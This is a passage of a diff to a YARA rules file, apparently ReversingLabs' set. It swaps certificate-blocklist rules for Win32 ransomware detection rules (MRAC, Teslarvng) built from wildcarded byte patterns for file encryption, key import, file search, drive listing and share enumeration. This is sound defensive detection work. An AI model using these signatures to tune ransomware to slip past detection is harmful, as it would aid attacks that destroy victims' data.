+            E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 90
+            66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ??
+            ?? ?? ?? 57 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ??
+            ?? ?? 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8B D1 83 C4 ?? 0B D0 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 74 ?? 50 51 8D
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 C4 ?? 3A C1 75 ?? 01 0D ?? ?? ??
+            ?? 11 35 ?? ?? ?? ?? EB ?? 01 0D ?? ?? ?? ?? 11 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51
+            53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 5E 33 CD
+            B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$get_logical_drives_list_p1 = {
+            8D 85 ?? ?? ?? ?? 50 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57
+            57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ??
+            ?? ?? 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 89
+            A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33
+            FF 89 7D ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75
+            ?? 57 8D 8D ?? ?? ?? ?? 2B C2 51 50 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? ??
+            ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF 15
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 ?? 66 85
+            D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB
+        }
+		$get_logical_drives_list_p2 = {
+            1B C0 83 D8 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 89 B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE D3 E2 85 95 ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 8D 4E ?? 66 89 8D ?? ?? ?? ?? 33 C9 6A ?? 51 8D 95 ?? ?? ?? ?? 52 C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ??
+            ?? 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? BF ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 39 78 ?? 72 ?? 8B 00 8D
+            50 ?? 8A 08 40 84 C9 75 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 2B C2 50 83 EC ?? B8 ?? ?? ??
+            ?? 8B CC 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            39 78 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ??
+            ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 89 B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 46 89 B5 ?? ?? ?? ?? 83
+            FE ?? 0F 8C ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? 8B
+            4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IT PUT LIMITED" and ( pe.signatures [ i ] . serial == "00:eb:bd:d6:cd:ed:a4:0c:a6:45:13:28:0e:cd:62:5c:54" or pe.signatures [ i ] . serial == "eb:bd:d6:cd:ed:a4:0c:a6:45:13:28:0e:cd:62:5c:54" ) and 1549238400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $get_logical_drives_list_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_61Da676C1Dcfcf188276E2C70D68082E : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_MRAC : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects MRAC ransomware."
 		author = "ReversingLabs"
-		id = "d974b740-38fa-564d-b4c6-8955568a4e77"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "135c3dc9-bf08-5f00-bade-7054d9f33830"
+		date = "2022-02-21"
+		modified = "2022-02-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3140-L3156"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.MRAC.yara#L1-L69"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4f8af4a5c9812e6559218e387e32bc02cb0adcd40d9d4963fefc929f6101ae9a"
+		logic_hash = "04e8364dc9c726f4bb2d3035e5b7e8dab4cae124b2f047be6f11b865fab557a7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "MRAC"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            B8 ?? ?? ?? ?? 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ??
+            83 C1 ?? 83 C0 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 8B 75 ?? 85 C0 75 ?? B1
+            ?? EB ?? 32 C9 8B 45 ?? 88 4D ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ?? 8B C6 81 F9 ??
+            ?? ?? ?? 72 ?? 8B 76 ?? 83 C1 ?? 2B C6 83 C0 ?? 83 F8 ?? 77 ?? 51 56 E8 ?? ?? ?? ??
+            8A 4D ?? 83 C4 ?? 8A C1 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ??
+            ?? ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? E8
+        }
+		$import_key = {
+            8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 89 45 ?? 8D 4D ?? 51 50 6A ?? 6A ?? FF 75 ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? FF
+            75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F
+            84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15
+            ?? ?? ?? ?? 8B C8 F6 C1 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 C1 E8 ?? 40 C1 E0 ?? 2B
+            C1 68 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 6A
+            ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8B 45 ?? 3D ?? ?? ?? ?? 0F 92 C3 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 57 6A ?? 0F
+            B6 C3 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D
+            45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? EB ?? 8B 75 ?? 84
+            DB 74
+        }
+		$find_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 74 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 06 FF
+            D7 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3
+            F6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B
+            4D ?? 6A ?? 68 ?? ?? ?? ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "P2N ONLINE LTD" and pe.signatures [ i ] . serial == "61:da:67:6c:1d:cf:cf:18:82:76:e2:c7:0d:68:08:2e" and 1552723954 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $import_key ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_767436921B2698Bd18400A24B01341B6 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Teslarvng : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Teslarvng ransomware."
 		author = "ReversingLabs"
-		id = "3e3b2b75-9416-5c4f-ad47-88f92039f532"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "7045b13e-95a5-54da-b540-75d464e7673d"
+		date = "2020-12-14"
+		modified = "2020-12-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3158-L3174"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Teslarvng.yara#L1-L137"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "759bbbc5929463ad68d5dcd28b30401b9ff680f522172ed8d5d7dd3772e07587"
+		logic_hash = "670621aa196a80fbb694e4b1690d7da60e881c5b826133939e61cd6c2406ea98"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Teslarvng"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? A8 ?? 00 00 A1 ?? ?? ?? ?? ?? ?? ?? ?? EC 56 57 50
+            8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? C9 89 4D ?? 89 4D ?? 8B 73 ?? 8B 43 ?? 89 75
+            ?? 89 45 ?? 3B F0 0F 84 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 06 8D 04 40 C1 E0 ?? 89 45
+            ?? 8B 04 02 8B 40 ?? 8B 30 3B F0 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 3D ??
+            ?? ?? ?? 10 89 ?? ?? ?? ?? E3 ?? 00 0F 43 05 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? 33 C0
+            83 C9 ?? 66 89 45 ?? 89 4D ?? 8D 4D ?? 8B 47 ?? 40 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? ?? 8B
+            C7 72 ?? 8B 07 FF 77 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C9 68 ?? ?? ?? ?? 0F 10 00 0F 11 85
+            ?? ?? ?? ?? F3 0F 7E 40 ?? 83 4D ?? ?? 66 0F D6 45 ?? 66 89 08 8D 8D ?? ?? ?? ?? C7
+            40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 6A ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 74 ?? 6A ?? 8D 4D ?? 51
+        }
+		$encrypt_files_p2 = {
+            FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ??
+            ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ??
+            8B 41 ?? 89 45 ?? 83 78 ?? ?? 8B 48 ?? 89 4D ?? 72 ?? 8B 00 89 45 ?? C6 45 ?? ?? 33
+            C0 83 4D ?? ?? 8D 4D ?? 66 89 45 ?? 8B 47 ?? 40 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 50 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ?? ?? 8B 47
+            ?? 72 ?? 8B 3F 50 57 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ??
+            8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 6A ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 74 ?? 6A ?? 8D 45
+            ?? 50 FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
+            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 65 ?? ?? C6 45 ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? 8B 36 8B 4D ?? 8B 04 02 3B 70 ?? 0F 85 ?? ??
+            ?? ?? 8B 75 ?? 83 C6 ?? 89 75 ?? 3B 75 ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D
+            4B ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D 8B E3 5B C2
+        }
+		$find_files = {
+            FF D6 83 F8 ?? 0F 85 ?? ?? ?? ?? 8D 43 ?? 50 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 83 78 ?? ?? 72 ?? 8B 00 B2 ?? 8B C8 E8 ?? ?? ?? ?? C6
+            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? 33 C9 8B 85 ?? ?? ?? ?? 03 8D ?? ?? ?? ?? 83 D0 ?? 50 51 FF B5 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B C8 90 66 8B 31 66 3B 32 75 ?? 66 85 F6
+            74 ?? 66 8B 71 ?? 66 3B 72 ?? 75 ?? 83 C1 ?? 83 C2 ?? 66 85 F6 75 ?? 33 C9 EB ?? 1B
+            C9 83 C9 ?? 85 C9 74 ?? B9 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B
+            50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ??
+            85 C0 74 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 45
+            ?? ?? EB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? FF D6 83 F8 ?? 0F
+            84 ?? ?? ?? ?? FF D6 8B D0
+        }
+		$enum_shares_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00 8D
+            75 ?? 83 7D ?? ?? 6A ?? 0F 43 75 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 B8 ?? ?? ??
+            ?? 56 66 89 45 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 66 89
+            45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D
+            45 ?? 50 57 FF 15 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? 89 7D ?? 50
+            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 6A ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 83 7D ?? ?? 0F 87 ?? ?? ?? ??
+            83 7D ?? ?? 0F 86 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B 75 ?? 0F
+            43 4D ?? 03 F1 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 0F 43
+            4D ?? 33 C0 66 89 45 ?? 8B C6 2B C1 89 4D ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? FF 75 ?? 8D 4D ?? 56 FF 75 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ??
+            ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 51 8D 4D ?? 51 6A ?? 8D 4D ?? 51 6A ?? 50 FF 15 ?? ??
+            ?? ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 66
+        }
+		$enum_shares_p2 = {
+            0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
+            ?? 33 F6 8B 55 ?? 85 D2 0F 84 ?? ?? ?? ?? 33 FF 8B 4D ?? 8B 44 39 ?? 85 C0 74 ?? 3D
+            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 14 39 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 48 ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 66
+            8B 08 83 C0 ?? 66 85 C9 75 ?? 2B 45 ?? 8D 4D ?? D1 F8 50 52 E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8B 45 ?? 3B 45 ?? 74 ?? 0F 10 45 ?? C7 40 ?? ?? ?? ?? ?? 0F 11 00 F3 0F 7E 45 ??
+            66 0F D6 40 ?? 33 C0 83 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45
+            ?? EB ?? 8D 4D ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
+            8B 55 ?? 46 83 C7 ?? 3B F2 0F 82 ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 3B 45 ?? 0F 84 ?? ??
+            ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 46 ?? 83 7D ?? ??
+            8B 7D ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 89 45 ?? 83 FF ?? 73 ?? 0F 10 00 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11
+            85 ?? ?? ?? ?? EB ?? 8B F7 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 CE ?? 3B F0 0F 47 F0
+        }
+		$enum_shares_p3 = {
+            8D 46 ?? 50 E8 ?? ?? ?? ?? 8D 0C 7D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 51 FF 75 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 8B 7D
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ??
+            3B F8 0F 84 ?? ?? ?? ?? 2B C7 C1 F8 ?? 69 F0 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 89 85 ??
+            ?? ?? ?? 8D 0C 76 89 45 ?? 8D 04 C8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ??
+            0F 57 C0 8B B5 ?? ?? ?? ?? 66 0F D6 45 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 89 75 ?? 89
+            45 ?? C6 45 ?? ?? 66 90 57 8B CE E8 ?? ?? ?? ?? 83 C6 ?? 83 C7 ?? 89 75 ?? 3B 7D ??
